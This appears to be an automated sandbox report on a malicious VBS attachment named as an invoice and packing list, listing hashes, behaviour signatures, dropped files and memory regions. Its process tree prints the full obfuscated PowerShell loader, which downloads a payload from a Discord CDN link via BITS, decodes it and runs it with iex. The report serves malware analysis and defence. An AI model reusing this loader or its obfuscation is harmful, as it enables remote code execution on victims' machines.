Analysis

  • max time kernel
    147s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20230712-en
  • resource tags

    arch:x64 arch:x86 image:win7-20230712-en locale:en-us os:windows7-x64 system
  • submitted
    07/08/2023, 18:47

General

  • Target

    INVOICE2023310643_Packing_List__CMR.vbs

  • Size

    16KB

  • MD5

    3739a1cb04d797a12296400184cb660e

  • SHA1

    61f01364e48cbf9af71598a865e2d966aa2f100b

  • SHA256

    d327a71665c7df97c34a5246c79c5ce6a4deccf5e470e048e6ef6c978bb9128a

  • SHA512

    b511d34ad8356adf2ad47c524172e4f05ff315e57c1a9c052026291ae3921cb493a9477825bb3fa987917e4db47265c332c39351c6c65dc8ac98126395603dcb

  • SSDEEP

    384:eMer0TdYUAIZA7fkoyRNJxyYLgLIUENbI2cKrI:evr0eIzhLsmbI2RrI

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\INVOICE2023310643_Packing_List__CMR.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:1996
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Sanaisoler959 ([String]$Subj){For($Overcau=1; $Overcau -lt $Subj.Length-1; $Overcau+=(1+1)){$Talebooktr=$Subj.Substring($Overcau, 1);$merka=$merka+$Talebooktr}$merka;}$Pyro=Sanaisoler959 ' hAtKtDpPsL: /D/IcRdFnO.BdLiTs c oSrbdUalpSp .GcOo md/RaCtctSaMcThNmSePnCtLsA/V1P1C3F6L0A9K4N1B8K2S2H4S7S7 7F6B4 4C1T/S1S1S3p7D8s7m1 1 2A4N9E2D3M9 4B5N1E5S2 /FSSpSrAoBgKfPrAiVnYgD.BdSwBp ';$merka01=Sanaisoler959 ' iBePxM ';$Brneraps = Sanaisoler959 ' \SsGyRsLwBo wT6T4G\CWAiDnPdOo wAsNPboFwOe r SHhseFlblU\Tv 1J.I0p\EpOoHwAePrSssh eSlUlI.PeWxReC ';&($merka01) (Sanaisoler959 'R$acFoBrFrNuFpEtSnFeGsS2T=H$ReDnLvF:AwJiSnVdAi r ') ;&($merka01) (Sanaisoler959 'V$BBsrInce rFa p sS=P$ScNoRrVrCuUpMtOnReSs 2G+L$SBBrTn eSrUaApSsU ') ;&($merka01) (Sanaisoler959 'A$ ASnIdPsEtIsDhGaTfSfM H=O T(B(SgLwFmBis swAiSnF3A2F_Fp rHoAcreDsVsE O-SFH NP rSo cCe sNsSI dB=Q$E{MPfIJDL}k) .ICSoSmUmTa nOdILTiHnFeH)R d-PsRp l iPtN a[Sc hHarrg] 3F4 ');&($merka01) (Sanaisoler959 ' $BGFeCvTaIeA6S5O G=k N$SA nOdts tTsLhSaMfDfA[U$rADn d sktDslhBaIfMfL.BcUo uQnntT- 2S]T ');&($merka01) (Sanaisoler959 's$HA lcpAhMoD=k(BTBeqsFts-IP aKtThP K$dBFrSn ePrCaGpUsS)P -DAKnDdl F(L[iISnmtgPAt r ]L:C:TsViIz en T- eBqM 8 )A ') ;if ($Alpho) {.$Brneraps $Gevae65;} else {;$merka00=Sanaisoler959 ' SStAaBrItS- BCiKt sUTSrCaRnHsSfKegr S-KSToHuUrVcbeP $DPny rCoA K- DFeSsPtSiSnZa tNiTo n M$ScAoJrCrEu p tOn e sA2F ';&($merka01) (Sanaisoler959 ' $VcGoFrCrFu pAtFndeKs 2L=C$AeRnhvP:HaPpRp dBahtDaD ') ;&($merka01) (Sanaisoler959 'UIVmIpToGrUt - M o d uRlMeU PB iAt s Tpr aVnHswfAeBr ') ;$corruptnes2=$corruptnes2+'\Toileda.Bun';while (-not $Campierpl) {&($merka01) (Sanaisoler959 'H$uCIaKm p iSeBr pLlA=s(PTfeCs tI-ZPMaCt ho G$AcPoFrKrOu pHtTnCeSsN2s) ') ;&($merka01) $merka00;&($merka01) (Sanaisoler959 'WSAtGaLrEtS-SSPlDePeFpE C5C ');}&($merka01) (Sanaisoler959 'P$RStaGn aIiBsFo lBeOrA9T5R F= TGTePtC-SCAoMnLtCeAn tK S$ cSoSrFrVu pHt nAeNs 2 ');&($merka01) (Sanaisoler959 
'G$sSZtWoAlneBrV2N1 1G S=E M[OSUyPs tCeMmB.MC oSn vEe r tI]C:B:MFCr oPm BAaMsOe 6T4SSBtTrBiGnbgA(D$kSOaLnDaSi sMoAlFe rw9 5V)P ');&($merka01) (Sanaisoler959 'N$Am errPk a 2S =S S[TSRySs tIeHmD. TAeIxstN. E n c oKdAi n g ]O:R:UASSPCDI IE.FGReEtUSHtLr iKnAg (l$ STtVoSlDeVrO2 1 1 )C ');&($merka01) (Sanaisoler959 ' $hRCePgReVlNm sSs iH=O$DmaeDr kba 2 . sfuNbLsAtBrYiLnTgU(B2E3S8O0D6R5T, 1S9B4B3P5L)S ');&($merka01) $Regelmssi;}"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3004
      • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Sanaisoler959 ([String]$Subj){For($Overcau=1; $Overcau -lt $Subj.Length-1; $Overcau+=(1+1)){$Talebooktr=$Subj.Substring($Overcau, 1);$merka=$merka+$Talebooktr}$merka;}$Pyro=Sanaisoler959 ' hAtKtDpPsL: /D/IcRdFnO.BdLiTs c oSrbdUalpSp .GcOo md/RaCtctSaMcThNmSePnCtLsA/V1P1C3F6L0A9K4N1B8K2S2H4S7S7 7F6B4 4C1T/S1S1S3p7D8s7m1 1 2A4N9E2D3M9 4B5N1E5S2 /FSSpSrAoBgKfPrAiVnYgD.BdSwBp ';$merka01=Sanaisoler959 ' iBePxM ';$Brneraps = Sanaisoler959 ' \SsGyRsLwBo wT6T4G\CWAiDnPdOo wAsNPboFwOe r SHhseFlblU\Tv 1J.I0p\EpOoHwAePrSssh eSlUlI.PeWxReC ';&($merka01) (Sanaisoler959 'R$acFoBrFrNuFpEtSnFeGsS2T=H$ReDnLvF:AwJiSnVdAi r ') ;&($merka01) (Sanaisoler959 'V$BBsrInce rFa p sS=P$ScNoRrVrCuUpMtOnReSs 2G+L$SBBrTn eSrUaApSsU ') ;&($merka01) (Sanaisoler959 'A$ ASnIdPsEtIsDhGaTfSfM H=O T(B(SgLwFmBis swAiSnF3A2F_Fp rHoAcreDsVsE O-SFH NP rSo cCe sNsSI dB=Q$E{MPfIJDL}k) .ICSoSmUmTa nOdILTiHnFeH)R d-PsRp l iPtN a[Sc hHarrg] 3F4 ');&($merka01) (Sanaisoler959 ' $BGFeCvTaIeA6S5O G=k N$SA nOdts tTsLhSaMfDfA[U$rADn d sktDslhBaIfMfL.BcUo uQnntT- 2S]T ');&($merka01) (Sanaisoler959 's$HA lcpAhMoD=k(BTBeqsFts-IP aKtThP K$dBFrSn ePrCaGpUsS)P -DAKnDdl F(L[iISnmtgPAt r ]L:C:TsViIz en T- eBqM 8 )A ') ;if ($Alpho) {.$Brneraps $Gevae65;} else {;$merka00=Sanaisoler959 ' SStAaBrItS- BCiKt sUTSrCaRnHsSfKegr S-KSToHuUrVcbeP $DPny rCoA K- DFeSsPtSiSnZa tNiTo n M$ScAoJrCrEu p tOn e sA2F ';&($merka01) (Sanaisoler959 ' $VcGoFrCrFu pAtFndeKs 2L=C$AeRnhvP:HaPpRp dBahtDaD ') ;&($merka01) (Sanaisoler959 'UIVmIpToGrUt - M o d uRlMeU PB iAt s Tpr aVnHswfAeBr ') ;$corruptnes2=$corruptnes2+'\Toileda.Bun';while (-not $Campierpl) {&($merka01) (Sanaisoler959 'H$uCIaKm p iSeBr pLlA=s(PTfeCs tI-ZPMaCt ho G$AcPoFrKrOu pHtTnCeSsN2s) ') ;&($merka01) $merka00;&($merka01) (Sanaisoler959 'WSAtGaLrEtS-SSPlDePeFpE C5C ');}&($merka01) (Sanaisoler959 'P$RStaGn aIiBsFo lBeOrA9T5R F= TGTePtC-SCAoMnLtCeAn tK S$ cSoSrFrVu pHt nAeNs 2 ');&($merka01) (Sanaisoler959 
'G$sSZtWoAlneBrV2N1 1G S=E M[OSUyPs tCeMmB.MC oSn vEe r tI]C:B:MFCr oPm BAaMsOe 6T4SSBtTrBiGnbgA(D$kSOaLnDaSi sMoAlFe rw9 5V)P ');&($merka01) (Sanaisoler959 'N$Am errPk a 2S =S S[TSRySs tIeHmD. TAeIxstN. E n c oKdAi n g ]O:R:UASSPCDI IE.FGReEtUSHtLr iKnAg (l$ STtVoSlDeVrO2 1 1 )C ');&($merka01) (Sanaisoler959 ' $hRCePgReVlNm sSs iH=O$DmaeDr kba 2 . sfuNbLsAtBrYiLnTgU(B2E3S8O0D6R5T, 1S9B4B3P5L)S ');&($merka01) $Regelmssi;}"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2264

Network

        MITRE ATT&CK Enterprise v15


        Downloads

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          344B

          MD5

          a6a9df95dca8497bc5ed1a0f159c6b9d

          SHA1

          8f3cf11fbe4f2f5cabaa115b8eeefb0e6f93c63e

          SHA256

          410dd1f40fd5c2b157687fd53feed90bcb2758acae145fc453b8be644968ec40

          SHA512

          3b569e507196da6742046ec12a82f013632c755167e7f693ef6b87d666d5a6048a052e58f098d07f71c7081a0f8d398f260e5e094d1d5aae1adebc9cd5449466

        • C:\Users\Admin\AppData\Local\Temp\Cab6E11.tmp

          Filesize

          62KB

          MD5

          3ac860860707baaf32469fa7cc7c0192

          SHA1

          c33c2acdaba0e6fa41fd2f00f186804722477639

          SHA256

          d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904

          SHA512

          d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

        • C:\Users\Admin\AppData\Local\Temp\Tar72E0.tmp

          Filesize

          164KB

          MD5

          4ff65ad929cd9a367680e0e5b1c08166

          SHA1

          c0af0d4396bd1f15c45f39d3b849ba444233b3a2

          SHA256

          c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6

          SHA512

          f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5X0NTGQAB7G2ZI4JOQHC.temp

          Filesize

          7KB

          MD5

          160a4e3770db46a442e4bce168a5bb76

          SHA1

          d45614566e57c35168415c6979ac057f62d8fea8

          SHA256

          75c7f73447027465482349e5343959720f934215bbe74796650284611e34c32d

          SHA512

          a1f73ed435910a8d14e53c15b76f8c3117733a18caf670d17e4bede635530e5545b346ed53801dcf14777e05b9f13849a5ca750892cd85f3dd43c7d5e18c1930

        • memory/2264-84-0x00000000027E0000-0x0000000002820000-memory.dmp

          Filesize

          256KB

        • memory/2264-83-0x00000000738B0000-0x0000000073E5B000-memory.dmp

          Filesize

          5.7MB

        • memory/2264-102-0x00000000027E0000-0x0000000002820000-memory.dmp

          Filesize

          256KB

        • memory/2264-101-0x00000000738B0000-0x0000000073E5B000-memory.dmp

          Filesize

          5.7MB

        • memory/2264-82-0x00000000738B0000-0x0000000073E5B000-memory.dmp

          Filesize

          5.7MB

        • memory/2264-85-0x00000000027E0000-0x0000000002820000-memory.dmp

          Filesize

          256KB

        • memory/3004-87-0x0000000002670000-0x00000000026F0000-memory.dmp

          Filesize

          512KB

        • memory/3004-76-0x000000001B330000-0x000000001B612000-memory.dmp

          Filesize

          2.9MB

        • memory/3004-86-0x000007FEF5BF0000-0x000007FEF658D000-memory.dmp

          Filesize

          9.6MB

        • memory/3004-77-0x0000000002670000-0x00000000026F0000-memory.dmp

          Filesize

          512KB

        • memory/3004-75-0x0000000002670000-0x00000000026F0000-memory.dmp

          Filesize

          512KB

        • memory/3004-74-0x000007FEF5BF0000-0x000007FEF658D000-memory.dmp

          Filesize

          9.6MB

        • memory/3004-98-0x000007FEF5BF0000-0x000007FEF658D000-memory.dmp

          Filesize

          9.6MB

        • memory/3004-99-0x0000000002670000-0x00000000026F0000-memory.dmp

          Filesize

          512KB

        • memory/3004-100-0x0000000002670000-0x00000000026F0000-memory.dmp

          Filesize

          512KB

        • memory/3004-78-0x0000000001FB0000-0x0000000001FB8000-memory.dmp

          Filesize

          32KB

        • memory/3004-79-0x0000000002670000-0x00000000026F0000-memory.dmp

          Filesize

          512KB